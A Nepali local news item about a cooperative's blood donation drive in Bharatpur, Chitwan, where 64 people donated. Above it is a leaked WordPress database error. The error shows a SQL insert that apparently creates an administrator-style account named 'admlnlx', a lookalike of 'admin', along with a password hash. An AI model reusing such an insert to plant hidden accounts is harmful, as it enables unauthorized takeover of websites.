WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiYE4fgbFhXjVJ1iPV3..IckxVNvMh/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 05:30:44', '', 'admlnlx', 'admlnlx')
चितवन, पुस ९–
देउराली बचत तथा ऋण सहकारी सँस्था लि. भरतपुर ४ बारघरेले शनिबार आयोजना गरेको रक्तदान कार्यक्रममा ६४ जनाले रक्तदान गरेका छन् ।
संस्थाको वार्षिक कार्यक्रम तालिका अनुसार आयोजित सो कार्यक्रम नेफ्स्कुन संचालक भरतप्रसाद दवाडीको प्रमुख आतिथ्यता, संस्थाका अध्यक्ष गुमानसिंह खड्काको सभापतित्व एवम् शिक्षा, स्वास्थ्य तालिम समितीका संयोजक नविन रिजालको संयोजकत्वमा सम्पन्न भएको हो । संस्थाकी शेयर सदस्य लक्ष्मी मिश्रलाई ब्लड ब्याग हस्तान्तरण गरि कार्यक्रमको शुभारम्भ गरिएको थियो । मानवताको सेवा नै जिवनको सर्वोत्तम कार्य हो भन्ने मुल मन्त्र सहित सो कार्यक्रम आयोजना गरिएको संस्थाका सचिव महादेव पौडेलले बताउनुभयो ।
संस्थाका पुर्व अध्यक्षहरु सुदिप वाग्ले, प्रदिप वाग्ले, स्थानीय विभिन्न संघसंस्थाका अध्यक्षहरुको सहभागिता रहेको सो कार्यक्रम सामाजिक सेवामा देउरालीको अभियान अन्तर्गत आगामी दिनमा पनि निरन्तरता दिईने संयोजक रिजालले बताउनुभयो । सो कार्यक्रम रक्तसंचार सेवा केन्द्र भरतपुरको प्राविधिक सहयोगमा सम्पन्न भएको थियो ।